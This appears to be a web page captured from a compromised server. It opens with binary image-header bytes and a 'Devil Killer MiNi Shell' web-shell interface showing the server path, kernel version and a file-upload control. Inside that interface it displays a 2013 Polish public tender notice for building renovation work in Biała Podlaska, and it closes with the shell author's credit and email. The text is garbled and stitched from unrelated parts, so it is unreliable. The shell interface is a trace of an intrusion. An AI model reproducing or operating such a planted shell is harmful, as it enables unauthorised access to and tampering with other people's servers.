JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130523/87069-N-2013.html

<p class="kh_header"><b>Biała Podlaska: Wykonanie inwestycji rewitalizacji terenu części śródmieścia Białej Podlaskiej w obszarze ulicy Moniuszki 25-31A.</b><br>
<b>Numer ogłoszenia: 87069 - 2013; data zamieszczenia: 23.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Lokalowej Sp. z o.o. , ul. Żeromskiego 5, 21-500 Biała Podlaska, woj. lubelskie, tel. 083 3436246, faks 083 3426837.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zglbialapodlaska.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie inwestycji rewitalizacji terenu części śródmieścia Białej Podlaskiej w obszarze ulicy Moniuszki 25-31A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja inwestycji pod nazwą rewitalizacja terenu części śródmieścia Białej Podlaskiej w obszarze ulicy Moniuszki 25-31A.
Zakres zamówienia obejmuje:
1) remont i przebudowę budynku mieszkalnego przy ul. Moniuszki 29 w Białej Podlaskiej, ze zmianą sposobu użytkowania na parterze budynku z lokali mieszkalnych na usługowe, z dojściami, dojazdami, miejscami postojowymi, sieciami uzbrojenia terenu i obiektami małej architektury, 
Budynek nr 29 jest budynkiem trzykondygnacyjnym, z poddaszem użytkowym na trzeciej kondygnacji. W budynku projektuje się częściową zmianę funkcji z mieszkalnej na usługową. Zmiana funkcji dotyczy lokali na poziomie parteru. W południowo-zachodniej części działki, częściowo w miejscu przeznaczonego do wyburzenia budynku gospodarczego zaprojektowano parkingi oraz osłonę śmietnikową. 
W istniejącym i rozbudowywanym budynku nr 29 projektuje się dwa lokale usługowe (parter) dostępne od strony ul. Moniuszki oraz 6 lokali mieszkalnych zlokalizowane na I , II kondygnacji.
Wyposażenie budynku w instalacje :
- woda z wodociągu miejskiego,
- c.o. z indywidualnych kotłów gazowych (gaz ziemny),
- ścieki do kanalizacji miejskiej wg wydanych warunków,
- instalacje elektryczne i telefoniczne,
- pomieszczenia kuchenne zaopatrzone w kuchnię na gaz ziemny,
- instalacja radiowo-telewizyjna kablowa,
- wentylacja pomieszczeń - grawitacyjna,
2) remont i przebudowę budynku mieszkalnego przy ul. Moniuszki 27 w Białej Podlaskiej, z dojściami, dojazdami, miejscami postojowymi, sieciami uzbrojenia terenu i obiektami małej architektury oraz rozbudowę i przebudowę budynku mieszkalnego przy ul. Moniuszki 25 w Białej Podlaskiej ze zmianą sposobu użytkowania na parterze budynku z lokali mieszkalnych na usługowe, z dojściami, dojazdami, miejscami postojowymi, sieciami uzbrojenia terenu i obiektami małej architektury, 
Rozbudowę przedmiotowego zespołu budynków przy ul. Moniuszki 25 i 27 w Białej Podlaskiej projektuje się od strony południowo-zachodniej jako oficynę budynku nr 25.
Budynek nr 25 jest budynkiem dwukondygnacyjnym, z poddaszem użytkowym na drugiej kondygnacji. W budynku nr 25 projektuje się częściową zmianę funkcji z mieszkalnej na usługową. Zmiana funkcji dotyczy istniejącej części budynku na poziomie parteru.
Budynek nr 27 jest budynkiem mieszkalnym wielorodzinnym, trzykondygnacyjnym (trzecia kondygnacja to poddasze użytkowe). 
W istniejących budynkach nowe ściany zaprojektowano w technologii murowanej, stropy żelbetowe, konstrukcja dachu drewniana. Rozbudowę budynku nr 25 zaprojektowano w technologii tradycyjnej: ściany murowane, stropy żelbetowe, konstrukcja dachu drewniana. Elewacje istniejących historycznych budynków przeznaczono do renowacji, a także odtwarza się detale architektoniczne. Nowo projektowane obiekty nawiązują skalą i architekturą do architektury historycznej. 
W istniejącym budynku mieszkalnym nr 27 przewiduje się lokalizację 4 lokali mieszkalnych na I, II, III kondygnacji nadziemnej. W istniejącym i rozbudowywanym budynku nr 25 projektuje się dwa lokale usługowe na parterze dostępne od strony ul. Moniuszki oraz cztery lokale mieszkalne zlokalizowane na I i II kondygnacji. 
Wyposażenie budynku w instalacje :
- woda z wodociągu miejskiego,
- c.o. z indywidualnych kotłów gazowych (gaz ziemny),
- ścieki do kanalizacji miejskiej wg wydanych warunków,
- instalacje elektryczne i telefoniczne,
- pomieszczenia kuchenne zaopatrzone w kuchnię na gaz ziemny,
- instalacja radiowo-telewizyjna kablowa,
- wentylacja pomieszczeń - grawitacyjna,
3) W ramach przedsięwzięcia przewidziano rozbiórkę czterech budynków gospodarczych parterowych, niepodpiwniczonych murowanych z cegły lub drewnianych o konstrukcji ryglowej z dachami drewnianymi pokrytymi papą. 
4) Prace obejmują również wykonanie systemu monitoringu obszaru oraz zagospodarowanie terenu w postaci wykonania ciągów pieszo - jezdnych i nowych miejsc parkingowych oraz założenia zieleni i wykonania części rekreacyjnej - placu zabaw.
Powierzchnia opracowania dla całego przedsięwzięcia		 2462m2 
Powierzchnia zabudowy istniejącej 
budynku przy ul. Moniuszki 29: 				   184 m2 		7,5%
Powierzchnia zabudowy istniejącej i projektowanej 
budynków przy ul. Moniuszki 25 i 27:				   274 m2 		11,1%
Powierzchnia zabudowy projektowanej
(projektowany budynek nie objęty zakresem zamówienia)	   336 m2 		13,7%
Powierzchnia zabudowy wszystkich budynków		   794 m2		32,3%
Dojścia i dojazdy, parkingi 					   958 m2		38,9%
Powierzchnia zieleni 					   710 m2		28,8%
zgodnie z zakresem określonym w dokumentacji projektowej oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych stanowiących załącznik nr 1 do SIWZ.
Uwaga: Zakres zamówienia nie obejmuje realizacji budynku przy ul. Moniuszki 31a który wchodzi w zakres pozwolenia na budowę dotyczącego przedmiotowej inwestycji. W ramach niniejszego zamówienia istniejący budynek pozostaje bez zmian, natomiast w obrysie projektowanego obiektu, przewiduje się tereny zielone, które należy ująć przy sporządzaniu ofert.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.50-7, 45.21.13.40-4, 45.26.00.00-7, 45.11.00.00-1, 45.40.00.00-1, 45.33.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości 30 000,00 zł (słownie złotych: trzydzieści tysięcy 00/100) wniesionym w:
-	pieniądzu,
-	poręczeniach bankowych,
-	poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (wyłącznie poręczenie pieniężne)
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit b ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
2.	Wadium w akceptowalnej formie powinno być wniesione przed upływem terminu składania ofert (tj. 10.06.2013r. 
godz. 10:00).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeżeli:
a)	Wykonawca, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał remonty kapitalne lub budowę nowych budynków mieszkalnych wielorodzinnych o łącznej kubaturze nie mniejszej niż 7 000m3.
b)	Wykonawca, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 700m2 tynków wapiennych elewacji zewnętrznej budynków.
c)	Wykonawca, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 200m2 pokryć dachowych blachą płaską w rąbek stojący. 
d)	Wykonawca, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 000m2 utwardzeń terenu kostką brukową.
e)	Wykonawca, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał instalacje gazowe obejmujące łącznie co najmniej 30 pieców gazowych z automatyką.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeżeli:
a)	Wykonawca dysponuje co najmniej po 1 osobie posiadającej uprawnienia budowlane niezbędne do pełnienia funkcji kierownika budowy (branża ogólnobudowlana) i kierowników robót (branża elektryczna, sanitarna, gazowa i drogowa)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeżeli: 
a)	Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z wykonywaniem robót budowlanych na kwotę co najmniej 1.000.000,00zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca w wykazie obowiązkowo wskaże roboty budowlane potwierdzające spełnianie warunku określonego pkt 1.2. lit. a) SIWZ, z ich wyszczególnieniem liczbowym umożliwiającym weryfikację wykonawcy, dla których złoży również poświadczenia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmiany postanowień umowy w stosunku do treści oferty, w następującym zakresie:
a) poprawy jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót budowlanych lub zmianą technologii na korzystniejszą, nowocześniejszą, tańszą niż określona w SIWZ,
b) wynikające z wprowadzenia do dokumentacji projektowej zmian, o których mowa w art. 36a ustawy z dnia 5 lipca 1994r. Prawo budowlane, niemożliwych do przewidzenia w chwili zawierania umowy, warunkujących prawidłowe wykonanie przedmiotu zamówienia lub których konieczność wynika ze zmiany obowiązujących przepisów, norm, lub z uwagi na postęp technologiczny.
c) zmiany w kolejności i terminach wykonywania robót budowlanych określonych w harmonogramie finansowo - rzeczowym, niemożliwych do przewidzenia w chwili zawierania umowy,
d) zmiany ilości lub rodzaju robót budowlanych, usług lub dostaw w stosunku do dokumentacji projektowej, mieszczącej się jednak z zakresie opisu przedmiotu umowy,
e) konieczności zmiany terminu wykonania przedmiotu umowy w przypadku: 
    - konieczności wykonania robót dodatkowych, warunkujących wykonanie przedmiotu umowy, 
    - wstrzymania wykonywania całości lub części robót na skutek wystąpienia okoliczności niezależnych od wykonawcy,   
pod warunkiem potwierdzenia przez inspektora nadzoru w dokumentacji budowy wystąpienia okoliczności uzasadniających zmianę terminu,
f) uzasadnionej rezygnacji z wykonania części zamówienia, 
g) zmiany inspektorów nadzoru inwestorskiego, kierownika budowy lub kierowników robót, pod warunkiem uzyskania zgody Zamawiającego na ustanowienie nowego kierownika budowy lub robót, 
h) zmiany lub ustanowienia nowych podwykonawców robót, pod warunkiem uzyskania zgody Zamawiającego na zatrudnienie nowego podwykonawcy,
i) zmiany ceny zamówienia będącej konsekwencją przypadków wymienionych w niniejszym ustępie lub gdy wynika ona ze zmian w obowiązującym prawie i jest obligatoryjna dla Wykonawcy (np. zmiana podatku VAT)
2. Jeżeli zmiana wymaga zmiany dokumentacji projektowej lub specyfikacji technicznych wykonania i odbioru robót budowlanych, strona inicjująca zmianę przedstawia projekt zamienny, zawierający opis proponowanych zmian oraz niezbędne rysunki. Projekt taki wymaga akceptacji nadzoru autorskiego a w przypadku, gdy stroną inicjującą zmianę jest Wykonawca, zatwierdzenia do realizacji przez Zamawiającego. 
3. Warunkiem dokonania zmian jest złożenie wniosku przez stronę inicjującą zmianę, zawierającego opis propozycji zmiany oraz jej uzasadnienie, a także obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie (jeżeli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy) oraz opis wpływu zmiany na harmonogram robót i termin wykonania umowy. 
4. Dokonanie zmian wymaga podpisania przez strony aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zglbialapodlaska.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Lokalowej Spółka z o.o.
ul. Żeromskiego 5, 21-500 Biała Podlaska
pok. nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2013 godzina 10:00, miejsce: Zakład Gospodarki Lokalowej Spółka z o.o.
ul. Żeromskiego 5, 21-500 Biała Podlaska
pok. nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> przedmiot zamówienia jest współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego wchodzącego w zakres projektu: Rewitalizacja terenu części śródmieścia Białej Podlaskiej w obszarze ulicy Moniuszki 25-31A, realizowanego w ramach osi priorytetowej III - Atrakcyjność obszarów miejskich i tereny inwestycyjne, działania 3.2. - Rewitalizacja zdegradowanych obszarów miejskich, Regionalnego Programu Operacyjnego woj. Lubelskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com